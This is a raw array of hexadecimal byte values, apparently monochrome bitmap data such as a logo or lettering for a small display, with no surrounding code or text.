0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X00,0XFF,0XFF,0XFF,0X00,0X00,
0X7F,0XC0,0X00,0X00,0X00,0X01,0XFF,0X8F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0X81,0XFE,0X00,0X00,0X00,0X00,0XFE,0X00,0X00,0X7F,0XFF,0XFF,
0X80,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XC0,0X00,
0X7F,0XE0,0X00,0X00,0X00,0X01,0XFF,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,
0XFF,0XFF,0XFF,0XFF,0X81,0XFE,0X00,0X00,0X00,0X00,0XFE,0X00,0X03,0XFF,0XFF,0XFF,
0XE0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X1F,0XFF,0XFF,0XFF,0XF0,0X00,
0X3F,0XE0,0X00,0X00,0X00,0X03,0XFF,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X01,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0X0F,0XFF,0XFF,0XFF,
0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,
0X3F,0XF0,0X00,0X00,0X00,0X03,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,
0XFE,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X1F,0XF0,0X00,0X00,0X00,0X07,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X07,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF7,0XFF,0XFF,0XC0,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,
0X1F,0XF8,0X00,0X00,0X00,0X07,0XFC,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0X80,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE7,0XFF,0XFF,0XE0,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,
0X0F,0XF8,0X00,0X00,0X00,0X0F,0XFC,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC7,0XFF,0XFF,0XF0,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X0F,0XFC,0X00,0X00,0X00,0X0F,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X87,0XFF,0XFF,0XF8,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X07,0XFC,0X00,0X00,0X00,0X1F,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X07,0XFF,0XFF,0XFC,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,
0X07,0XFE,0X00,0X00,0X00,0X1F,0XF0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XFF,0XFF,0XFE,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X07,0XFF,0XC0,0X00,0X01,0XFF,0XE0,
0X03,0XFE,0X00,0X00,0X00,0X3F,0XE0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XF8,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XE0,0X00,0X01,
0XFF,0XF0,0X0F,0XE0,0X00,0X00,0X00,0X3F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X07,0XFF,0XFF,0XFE,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0X00,0X00,0X00,0X7F,0XF0,
0X03,0XFF,0X00,0X00,0X00,0X3F,0XE0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XE0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0X80,0X00,0X00,
0X7F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X07,0XFF,0XFF,0XFF,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFE,0X00,0X00,0X00,0X3F,0XF0,
0X01,0XFF,0X00,0X00,0X00,0X7F,0XC0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XE0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0X00,0X00,0X00,
0X1F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0XFF,0X80,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFC,0X00,0X00,0X00,0X1F,0XF0,
0X01,0XFF,0X80,0X00,0X00,0X7F,0XC0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XE0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFC,0X00,0X00,0X00,
0X0F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFF,0XC0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF8,0X00,0X00,0X00,0X0F,0XF0,
0X00,0XFF,0X80,0X00,0X00,0XFF,0X80,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XF0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFC,0X00,0X00,0X00,
0X0F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFF,0XC0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF0,0X00,0X00,0X00,0X0F,0XF0,
0X00,0XFF,0XC0,0X00,0X00,0XFF,0X80,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XF8,
0X00,0X00,0X00,0X00,0X01,0XFE,0X00,0X00,0X00,0X01,0XFE,0X07,0XF8,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X07,0XFF,0XFF,0XFF,0XE0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF0,0X00,0X00,0X00,0X0F,0XF0,
0X00,0X7F,0XC0,0X00,0X01,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0X80,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF8,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X07,0XFF,0XFF,0XFF,0XE0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X7F,0XE0,0X00,0X01,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0XF0,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XF0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X3F,0XE0,0X00,0X03,0XFE,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFC,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0XF0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X3F,0XF0,0X00,0X03,0XFE,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,0XF8,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X1F,0XF0,0X00,0X07,0XFC,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XF8,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X1F,0XF8,0X00,0X07,0XFC,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X0F,0XF8,0X00,0X0F,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X1F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X07,0XFC,0X00,0X1F,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF0,0X00,0X00,0X00,0X0F,0XF0,
0X00,0X07,0XFC,0X00,0X1F,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF8,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFE,0X00,0X07,0XFF,0X80,0X7F,0XFE,0X00,0X07,0XF8,0X07,0XFF,0XFE,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X07,0XFE,0X00,0X3F,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X01,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFE,0X00,0X03,0XFF,0X00,0X3F,0XFE,0X00,0X07,0XF0,0X03,0XFF,0XFE,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X03,0XFE,0X00,0X3F,0XE0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0XFF,0XC1,0XFE,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFE,0X00,0X03,0XFE,0X00,0X3F,0XFC,0X00,0X27,0XF0,0X03,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X03,0XFF,0X00,0X7F,0XE0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X00,0X03,0XFE,0X00,0X3F,0XFC,0X00,0X3F,0XE0,0X01,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X01,0XFF,0X00,0X7F,0XC0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X00,0X01,0XFE,0X00,0X1F,0XF8,0X00,0X7F,0XE0,0X01,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0XFF,0X80,0XFF,0XC0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X01,0XFC,0X00,0X1F,0XF8,0X00,0X7F,0XC0,0X00,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0XFF,0X80,0XFF,0X80,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
